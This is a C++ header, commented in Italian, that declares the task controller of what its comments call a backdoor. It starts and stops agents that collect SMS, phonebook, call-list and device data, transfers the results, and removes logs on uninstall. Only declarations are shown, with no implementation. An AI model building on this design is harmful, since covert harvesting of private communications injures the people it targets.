#include "Common.h"
#include <string>
#include <exception>
using namespace std;

#ifndef __Task_h__
#define __Task_h__

#include "Conf.h"
#include "Status.h"
#include "Transfer.h"

class Conf;
class Status;
class Transfer;
class Task;

class Task
{
	/**
	 * Puntatore ad un oggetto Conf che viene allocato ed inizializzato dal costruttore. Viene liberato
	 * poi dal distruttore.
	 */
	private: Conf* configuration;
	private: Status statusObj;
	/**
	 * Questo flag viene settato se viene ricevuto l'evento UNINSTALL. In questo caso la TaskInit()
	 * rimuove i log e ritorna.
	 */
	private: BOOL bRemove;
	private: Transfer* transferObj;

	/**
	 * Torna il tempo attuale in epoch time tramite la chiamata a time() castata per tornare un UINT.
	 */
	private: UINT GetTime();

	/**
	 * Serve a non fare un loop infinito continuo e a dormire tra un controllo e l'altro della checklist. Per il momento
	 * lo sleep time e' configurato internamente, un futuro verra' reso configurabile. Gli Id riservati (da 0 1024)
	 * servono proprio per l'introduzione di futuri comandi di controllo dello stato.
	 */
	private: void Sleep();

	/**
	 * Setta i flag globali che triggherano la CANCELLATION_POINT. Torna TRUE appena l'agente identificato dall'ID
	 * si e' fermato, FALSE se l'agente ha superato il timeout.
	 */
	private: BOOL StopAgent(UINT id);

	/**
	 * Stoppa tutti gli agenti e torna TRUE se tutti si sono fermati nel timeout prestabilito, FALSE altrimenti. Imposta
	 * il flag STOP nella tabella degli agenti.
	 */
	private: BOOL StopAgents();

	/**
	 * Routine che viene utilizzata dal thread per la costruzione dell'oggetto SMS.
	 */
	private: DWORD WINAPI StartSms(LPVOID type);

	/**
	 * Routine che viene utilizzata dal thread per la costruzione dell'oggetto PhoneBook.
	 */
	private: DWORD WINAPI StartPhoneBook(LPVOID type);

	/**
	 * Routine che viene utilizzata dal thread per la costruzione dell'oggetto CallList.
	 */
	private: DWORD WINAPI StartCallList(LPVOID type);

	/**
	 * Routine che viene utilizzata dal thread per la costruzione dell'oggetto Device.
	 */
	private: DWORD WINAPI StartDevice(LPVOID type);

	/**
	 * Routine che viene utilizzata dal thread per la costruzione dell'oggetto Timer.
	 */
	private: DWORD WINAPI StartTimer(LPVOID type);

	/**
	 * Routine che viene utilizzata dal thread per la costruzione dell'oggetto Transfer.
	 */
	private: DWORD WINAPI StartTransfer(LPVOID type);

	/**
	 * Avvia tutti gli agenti (tramite le Start*) che sono marcati come attivi nell'oggetto Status.Agents. Torna TRUE se tutti gli
	 * agenti sono partiti correttamente, FALSE altrimenti.
	 */
	private: BOOL StartAgents();

	/**
	 * Instanzia l'oggetto Conf ed inizializza la configurazione.
	 */
	public:  Task();

	/**
	 * Questa funzione stoppa tutti gli agenti attivi, chiama Conf e carica la configurazione, quindi riavvia tutti gli
	 * agenti. Torna TRUE se la backdoor e' stata inizializzata con successo, FALSE altrimenti. TaskInit() deve
	 * controllare bRemove prima di avviare gli agenti.
	 */
	public: BOOL TaskInit();

	/**
	 * Scorre la lista degli eventi, controlla quali sono stati attivati ed esegue le relative azioni. Ogni azione e'
	 * sequenziale, pertanto questa funzione non deve essere eseguita in un thread separato. Deve verificare
	 * lo stato di bRemove subito dopo l'inizio della funzione.
	 */
	public: void CheckEvents();
};

#endif
